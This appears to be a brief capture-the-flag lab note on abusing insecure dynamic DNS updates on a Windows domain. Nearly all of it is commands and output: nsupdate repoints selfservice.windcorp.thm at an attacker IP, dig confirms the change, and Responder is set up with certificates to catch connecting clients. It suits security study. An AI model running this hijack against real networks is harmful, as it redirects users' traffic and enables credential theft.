Insecure Dynamic DNS Updates

dns, windows, foothold

What is Dynamic DNS Updates? #

Vulnerability #

An attacker can replace a record by its own IP which will force clients to connect to it.

Steps #

➜ nsupdate
> server 10.10.23.72
> update delete selfservice.windcorp.thm 
> send
> update add selfservice.windcorp.thm 1234 A 10.11.40.33
> send
> quit
➜  ra2 dig selfservice.windcorp.thm a @thm

; <<>> DiG 9.16.15-Debian <<>> selfservice.windcorp.thm a @thm
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 57355
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;selfservice.windcorp.thm.	IN	A

;; ANSWER SECTION:
selfservice.windcorp.thm. 1234	IN	A	10.11.40.33

;; Query time: 188 msec
;; SERVER: 10.10.23.72#53(10.10.23.72)
;; WHEN: Sat Sep 18 08:00:02 EDT 2021
;; MSG SIZE  rcvd: 69
sudo cp *pem /usr/share/responder/certs/
➜  scans cat /etc/responder/Responder.conf| grep cert
SSLCert = certs/crt.pem
SSLKey = certs/key.pem
➜  scans 
sudo responder -I tun0